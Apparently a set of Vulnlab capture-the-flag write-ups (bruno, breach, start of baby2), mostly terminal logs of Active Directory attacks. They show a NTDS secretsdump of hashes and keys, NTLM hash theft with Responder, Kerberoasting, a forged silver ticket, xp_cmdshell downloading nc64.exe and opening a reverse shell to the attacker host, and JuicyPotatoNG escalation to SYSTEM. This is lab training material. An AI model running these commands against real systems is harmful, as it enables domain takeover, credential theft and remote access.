AYBgr50u2woW4dIeGMvOy98n3ACkLvTDq8X9SFH/Q2bWrdTGdhBMY/w6micJCHfWLULaYNTJA2NQJpY/+UL8icwX86NRH4Oxnc7bMgqAF8364UmwiCyF/X9dOguuV06IDOF3IVmD0abV2pDR+ZohS9psgvdX4EFW1ijTSeiCvtnTSsgEb43un0syEDbTlCepwEj3q5771yIaATnO/qgzviUI6iGXC0uPNCtfrMEaHYNspycc6zvoVb4o5dIZMm0TG54URf6FniU2hVNylxoHUycz9D3Np06Z5PKYoWAm0SrzcUPK1z/lj14h1LrQqUiIAOe9k0pEcEaubfTxmkSZPNm8GJXdKkgfR7lwZN3oaByLuTEIXHkjijFjW1FauxdnZMeTNH3htSwlqqUGuSogvVlWftCBG7jqQFtUFSVf8y8abClEa3FL1bCHho/B4rzbXBBsWHqgtG7YUv5K0sr8nPJDHou/Oxvg/bRPazozG8iF9oL8bCkuxNe29KLfVlSZgZh6qKx8LPyXdmIuNKjlsi1I/atjbzDnY5TPyoQ+EfzeftCl7PZ15Hi+q7V72AIKchFxDlBdnxRb4mS2a8u+DraNiwcGrWr4IR5l6rNdsv2HHizThU5gwY6u48Bel9e2uKmD1qALt0Ry813ByLkI5jFkqXmbaFr680hv78GDp6lZM2+N72/siw1eNgRZVAPuqrSBPPkzLKbg6tLM8ei1Wwq9K7Wa5tZSVa74aNcft8riBH0B/uyiWz8cIhT968puaQHBm9lY9IAYPSc3JTmptlzMumLRZLs51OYqF3EZy7ungfAdALc169IOcCgdVVpQFz+tQ8iaTY/uU28eXleeE1/gOyWHFKgczysuTS3GehqtWvxXyM1e7SQscF/YiDz1WvYP+QgUxsBwx6L07E/N6zB62fxRxkVwh/J4Yuh30YMyAOF7U787OKhXgJL+CD8VAxqWr22fhCnJmOFrVEOWeSsfkpm5LFiKkj5z3qqGKrXkZv/+j9rC3KNlPXU1QWPYp2Az73I2Gif4M5GD8MG1n2LE+iGgULWM+pC5NbEscE7ZmUDSlXV9jcWdH9/FyqYdz9sfxdOokjkxaODVhjhBkg2MP4jL0tfGgo8T0zO6ldGNVkN9ZCS8ggk7a6z7AzI8zJlsrPH4upDT/53+6TmNJ0/an4nHcxsqEEKvO7X/Mv0/VOfO2Fc1BhXEvx7WiKL4NIO7fa+YJ+uVRxxTPz6TlGjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaArMCmgAwIBEqEiBCC91MoyNfmofB5PRz4Juw5IuklAeZGvQjlSH98jTDHkFKEKGwhCUlVOTy5WTKIVMBOgAwIBAaEMMAobCGJydW5vZGMkowcDBQBA4QAApREYDzIwMjQwNjEwMTE0NTAzWqYRGA8yMDI0MDYxMDIxNDUwM1qnERgPMjAyNDA2MTcxMTQ1MDNaqAobCEJSVU5PLlZMqR0wG6ADAgECoRQwEhsGa3JidGd0GwhicnVuby52bA==

  ServiceName              :  krbtgt/bruno.vl
  ServiceRealm             :  BRUNO.VL
  UserName                 :  brunodc$ (NT_PRINCIPAL)
  UserRealm                :  BRUNO.VL
  StartTime                :  6/10/2024 11:45:03 AM
  EndTime                  :  6/10/2024 9:45:03 PM
  RenewTill                :  6/17/2024 11:45:03 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  vdTKMjX5qHweT0c+CbsOSLpJQHmRr0I5Uh/fI0wx5BQ=
  ASREP (key)              :  F312EF7E042FED8F03C8862145DAAD54EC9A2CB14C510C885EADA1BBAF3D5C9B

PS C:\temp> 

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nano bruno.ticket
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ cat bruno.ticket | base64 -d > bruno.ticket.kirbi
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-ticketConverter bruno.ticket.kirbi bruno.ticket.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ export KRB5CCNAME=bruno.ticket.ccache               
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ klist
Command 'klist' not found, did you mean:
  command 'flist' from deb mmh
  command 'flist' from deb nmh
  command 'mlist' from deb mblaze
Try: sudo apt install <deb name>
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-secretsdump 'brunodc$'@brunodc.bruno.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:137<REDACTED>fd4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:926afc778f7a1406b77513d875520c6f:::
bruno.vl\svc_net:1103:aad3b435b51404eeaad3b435b51404ee:c4f34b79030a4329c7929a71c79baf38:::
bruno.vl\svc_scan:1104:aad3b435b51404eeaad3b435b51404ee:c4f34b79030a4329c7929a71c79baf38:::
bruno.vl\Chloe.Ball:1106:aad3b435b51404eeaad3b435b51404ee:4efe75a82ece893bd878ca66c04e1cc5:::
bruno.vl\Kayleigh.Patel:1107:aad3b435b51404eeaad3b435b51404ee:821550a6d75171382849d63e3c12dad1:::
bruno.vl\Donna.Harrison:1108:aad3b435b51404eeaad3b435b51404ee:120ca8e1b8d4fecc5d7417b638f30d0c:::
bruno.vl\Charles.Young:1109:aad3b435b51404eeaad3b435b51404ee:3d50f4c837cef7cf5143767553b6cc19:::
bruno.vl\Graeme.Grant:1110:aad3b435b51404eeaad3b435b51404ee:e5b5bc6a01fd48adc0f67a71629b5c19:::
bruno.vl\Natalie.Anderson:1111:aad3b435b51404eeaad3b435b51404ee:880c8cb0afc411db5d4b8a3159577d44:::
bruno.vl\Sam.Owen:1112:aad3b435b51404eeaad3b435b51404ee:830681ca97d7f828f939e5f9cdfed754:::
bruno.vl\Jeremy.Singh:1113:aad3b435b51404eeaad3b435b51404ee:8b1263356938ce9d149f3518e67b9959:::
bruno.vl\Kieran.Day:1114:aad3b435b51404eeaad3b435b51404ee:2f80b61c70a348160f4632cef9a6215b:::
bruno.vl\Hugh.Young:1115:aad3b435b51404eeaad3b435b51404ee:78eef081a8838baca1f2f547ce6f935a:::
BRUNODC$:1000:aad3b435b51404eeaad3b435b51404ee:b8e4490980c8dd1be0d35703bf4bf393:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
krbtgt:aes256-cts-hmac-sha1-96:3b081440c5131b441555f59f7613e2f9ec83ff07c5036bd973f084b14dbe8e46
krbtgt:aes128-cts-hmac-sha1-96:b6d4be2ff14de3b0a557b9f40a563c59
krbtgt:des-cbc-md5:02c8e92313912638
bruno.vl\svc_net:aes256-cts-hmac-sha1-96:cafb9b5775dea822bdb66248e61cf09d003ac8b553ab2d85793f6ea00ea15b91
bruno.vl\svc_net:aes128-cts-hmac-sha1-96:749f1f62dfec1b66a4bcf60a07f6a465
bruno.vl\svc_net:des-cbc-md5:2cfef2a8b57cd907
bruno.vl\svc_scan:aes256-cts-hmac-sha1-96:82e976d9e83a3cfb4a4b5f51567d930ffd1c9c25e76faa1ea137108421ca4426
bruno.vl\svc_scan:aes128-cts-hmac-sha1-96:4e5c05a594239a1516e4a3f59ebf6a13
bruno.vl\svc_scan:des-cbc-md5:46ec4f92a879d61f
bruno.vl\Chloe.Ball:aes256-cts-hmac-sha1-96:47864e8404b82923f404de8ccbf3676dd4793ba12ae85b110d0024b9132f6568
bruno.vl\Chloe.Ball:aes128-cts-hmac-sha1-96:657d98a2af99bc16a1536c5eccb19ae2
bruno.vl\Chloe.Ball:des-cbc-md5:31a2df8ac2f1bf45
bruno.vl\Kayleigh.Patel:aes256-cts-hmac-sha1-96:daf846bbd582cb30d29e5ed2e94ffaf0395c23189f92a3b8c12fc96fbee52314
bruno.vl\Kayleigh.Patel:aes128-cts-hmac-sha1-96:14b06cf39227e426b70ba14442dee40f
bruno.vl\Kayleigh.Patel:des-cbc-md5:1032c4012fd5ae19
bruno.vl\Donna.Harrison:aes256-cts-hmac-sha1-96:144cc36b3f8ef377d047404029a12368456eb09c7b2eec6441024d464af6a024
bruno.vl\Donna.Harrison:aes128-cts-hmac-sha1-96:1770287318457adf814de9048c465c7c
bruno.vl\Donna.Harrison:des-cbc-md5:4c7c855b29a151d3
bruno.vl\Charles.Young:aes256-cts-hmac-sha1-96:317b168352e1221177206391b1a1bc0711650439ca62a09803c15e5fefc7ee6e
bruno.vl\Charles.Young:aes128-cts-hmac-sha1-96:924ebf2f4964cd171dcff85d2da3329a
bruno.vl\Charles.Young:des-cbc-md5:585720310807e5b0
bruno.vl\Graeme.Grant:aes256-cts-hmac-sha1-96:1224cadd3186dfe32b13cf92bd399fc6b8ebd82ae1fc070f2195fdf8c501fbd0
bruno.vl\Graeme.Grant:aes128-cts-hmac-sha1-96:388fde76a02042631fa10b9f32b2c4c9
bruno.vl\Graeme.Grant:des-cbc-md5:cb6d7615a19892c8
bruno.vl\Natalie.Anderson:aes256-cts-hmac-sha1-96:b34fffd92671bba884152777617193cc95a971f63cb38b2bb7dc51a3af0e6bd2
bruno.vl\Natalie.Anderson:aes128-cts-hmac-sha1-96:50454fdeb8dd28d3419a124971173706
bruno.vl\Natalie.Anderson:des-cbc-md5:2085d92cbcbf0d1c
bruno.vl\Sam.Owen:aes256-cts-hmac-sha1-96:b3b51369f137312db8e6069f966c77f76008a32d8d495f16f57fac56e76f10f7
bruno.vl\Sam.Owen:aes128-cts-hmac-sha1-96:0f4fb13e3e763b05d95ac0158cd293eb
bruno.vl\Sam.Owen:des-cbc-md5:d349daefc10dea37
bruno.vl\Jeremy.Singh:aes256-cts-hmac-sha1-96:465a4605922f10445fcfd767775fc59997a63bb6dffcbe6886e8e70a969febc1
bruno.vl\Jeremy.Singh:aes128-cts-hmac-sha1-96:e80e467d2c52415a45365a55fababc47
bruno.vl\Jeremy.Singh:des-cbc-md5:fef23ba22cbcb62f
bruno.vl\Kieran.Day:aes256-cts-hmac-sha1-96:98914ef5df0e8a39eb953a9bbe286dd6861d4e7822311e182be4efcf299872de
bruno.vl\Kieran.Day:aes128-cts-hmac-sha1-96:4c472b9aa96f99c5f35b26ff2ffcaf03
bruno.vl\Kieran.Day:des-cbc-md5:0bd0c752929d5210
bruno.vl\Hugh.Young:aes256-cts-hmac-sha1-96:be216166da5744799c4d1ad6cf67c1b20aa9a0e4f08bd3f98fcc7ea4fff7e120
bruno.vl\Hugh.Young:aes128-cts-hmac-sha1-96:b40a015e3eff27964ef88f703bf9568e
bruno.vl\Hugh.Young:des-cbc-md5:bcf4da80341c19a7
BRUNODC$:aes256-cts-hmac-sha1-96:99b6b10d2ad226d66dbaa8bbbd0dc0008684fcca5750a7cd0494e09cc620368f
BRUNODC$:aes128-cts-hmac-sha1-96:dd5bdb908dd8127684e4d29b28ccd851
BRUNODC$:des-cbc-md5:6152ce8a26163ec2
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]

 

Beyond root

*Evil-WinRM* PS C:\windows\system32\tasks> hostname
brunodc
*Evil-WinRM* PS C:\windows\system32\tasks>  Get-MpComputerStatus


AMEngineVersion                  : 0.0.0.0
AMProductVersion                 : 4.18.2203.5
AMRunningMode                    : Not running
AMServiceEnabled                 : False
AMServiceVersion                 : 0.0.0.0
AntispywareEnabled               : False
AntispywareSignatureAge          : 4294967295
AntispywareSignatureLastUpdated  :
AntispywareSignatureVersion      : 0.0.0.0
AntivirusEnabled                 : False
AntivirusSignatureAge            : 4294967295
...            :



*Evil-WinRM* PS C:\windows\system32\tasks> type scanner
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2022-06-29T13:50:49.3977635</Date>
    <Author>BRUNO\administrator</Author>
    <URI>\scanner</URI>
  </RegistrationInfo>
  <Triggers>
    <BootTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <Delay>PT1M</Delay>
    </BootTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>svc_scan</UserId>
      <LogonType>Password</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\samples\app\SampleScanner.exe</Command>
    </Exec>
  </Actions>
</Task>
*Evil-WinRM* PS C:\windows\system32\tasks> 

 

.

 

vulnlab-breach

vulnlab breach

a Medium Windows machine

tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe

.

we  create a bunch of files which will lead to a NTLMv2 hash stealing attack using this tool: https://github.com/Greenwolf/ntlm_theft

python ntlm_theft.py -g all -s 10.10.97.69 -f puckie

.

┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000
[*] Skipping previously captured hash for BREACH\Julia.Wong

.

The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.

hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt

 

as Julia.Wong

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?
                                                                                                                     

 

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$a6211db7cc5fb5d31bc2338c501b4b7e990dc8cee0c416b2c0d89de679cc95a7ab289f018a43a37c113e2d99b058d51b50ab4fc5c10b3dc54451444f0e129b435d4d7a7302feb22e19e6983fa6493c83ce6910341a4f1e2b6404565a2f272b09b1511faead8cd5e2bfb82ca51b20b8170147af1aa262b62c95f32b8f5e43cedd5a9e76239d33f87be790624c2a2077cf7b2f5a2aecd3d6e9105321a4d150ea3ffbfb4ee7e4a4c9cf45a056ff7df8f6732f08f45d4c5bcfa4f747078ad5ffa29ac4a68950379570e53ddead20f5320635f2b111f39c81e655086451a078db3a0a3159fe2a4289a57ddde3e65b04b3d2942a3d79a95c8a0dca50c5cfe93e52610256c4a069ba51318584e7d0ccbaee4bfeffce4f9aff6b415276f5ee88ebe9623ebeefaf73da42b5239b3fd1b62fa581556d427ec512df3798042a17e062eea1d676be04735fda3d0043705d4f1f9ca87612230b42cad9bfd867f58cba6c26c06332dde93c81f29ddc039ec5a35269a1f003148fac2ffca4a3f7f2b316fcd59401c9b68cabd231aeebb08f41800c9ab7811562eca1c23ac4def78e18af008ce98e8351f1d3afb437f2f325d645e5bfc7177184018cc00e0fed69c375a91887d02e0f4f1e7a025164431f28a922494acca4b4e36d3d6684e7137879d692117b01bd7c27adff6783e887c06a8841f3a8148fbf419805d967a1716693370d5b442bce99756c58bdcdff1f4be584b525cddf4bba0c0e9f82e0f92199b30854306036db6ff868eb5bfe186b30de5afd07837977f3aa462dff42ad1ce63fa743fdbcc267ad45d65adbdd3e30d9f310860a987cbb1aea8ef9eab1f5752a9a3e686c1d3d503fc006e5df3a49c53d2ab3c45e80f78cd5eba2a72530966e1d15d097fb2700150e3eabb451d3cebf1c7abbcc06c02ef06757f59ec2038761610cd6b25ea83ae019f3805fc31ae3cbd9ea9ed193f622b175f2fe2e737e6fed9be29d31f4947a4ec24be9a9f79af713f991ae842010a7079821e76af8ced756f1e2c83370d1940ec99fff26394e01d17cadef7551b053d7b998ca62c1f1f83cd9a3aa6db9eb6dde4a68fe19f2ac49d3efc4f93bebf3f62cf41fa1d1f5c01fa0978a4c1f7c4774482bb4469b00cd59f782ffef40e09cff227614e6c5a807322302be2cc0f4f28492d95a724b561a21884ac94066d8fe8a82ebdf8a51a590b2635a3be34c00170d55815fa286ccdf8ed7c04c0914090ed7e9a39666d5d6533f6b20846b8a398706ec251064d76960f7af521f9a77439585bb2ba2f6397b7bacbdb1ac81bdcd2ee6bbf3c3005923890c538d9c7ba3ccca2984901ed7a696e02a8e1ab6e64aef3f487f1cf118c3714085ac652f9f202e747b501eaa981644639d59bed8d9891fdc407a23faf797239454d948d5290376271e091621b11bd16ee5ecb5cdd80d73a5bf2fdbd60b739c265fd8a4b22e606b86865f3ebffa9c
                                                                                                                     

Getting more users

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                     
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Silver ticket create with the NTLM hash of the svc_mysql user:

In order to perform a silver ticket attack we require the Domain SID , User NTLM hash & User SPN

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
                                                                                                                     
export KRB5CCNAME=administrator.ccache

.

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

.

 

SQL stuff

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output                                                       
----------------------------------------------------------   
 Volume in drive C has no label.                             

 Volume Serial Number is B465-02B6                           

NULL                                                         

 Directory of C:\                                            

NULL                                                         

08/19/2021  06:24 AM    <DIR>          EFI                   

02/17/2022  09:55 AM    <DIR>          inetpub               

05/08/2021  08:20 AM    <DIR>          PerfLogs              

02/17/2022  10:28 AM    <DIR>          Program Files         

02/17/2022  10:27 AM    <DIR>          Program Files (x86)   

02/17/2022  02:11 PM    <DIR>          share                 

02/17/2022  01:12 PM    <DIR>          Users                 

02/17/2022  03:35 PM    <DIR>          Windows               

               0 File(s)              0 bytes                

               8 Dir(s)  11,722,678,272 bytes free           

NULL                                                       

                         

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is B465-02B6                   

NULL                                                 

 Directory of C:\Temp                                

NULL                                                 

06/07/2024  10:34 AM    <DIR>          .             

06/07/2024  10:34 AM            45,272 nc64.exe      

               1 File(s)         45,272 bytes        

               1 Dir(s)  11,754,811,392 bytes free   

NULL                                                 

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"


 

 

.

 

Privesc with JuicyPotatoNG

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>

.

┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC


 

.

 

 

vulnlab – baby2

Baby2 is an medium Windows machine on Vulnlab

https://wiki.vulnlab.com/intro/lab-access

Tools used : kerbrute_linux , crackmapexec , responder , smbclient , bloodhound-python , pygpoabuse.py , evil-winrm , impacket-secretsdump

After the nmap scan, we add to our /etc/hosts

110.10.107.115 dc.baby2.vl baby2.vl

SMB enumeration

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ ./kerbrute_linux_386 userenum -d baby2.vl --dc 10.10.107.115 ./users.txt -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/05/24 - Ronnie Flathers @ropnop

2024/06/05 10:51:32 >  Using KDC(s):
2024/06/05 10:51:32 >  	10.10.107.115:88

2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Joan.Jennings@baby2.vl
2024/06/05 10:51:32 >  [!] library        @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Mohammed.Harris@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Kieran.Mitchell@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Harry.Shaw@baby2.vl
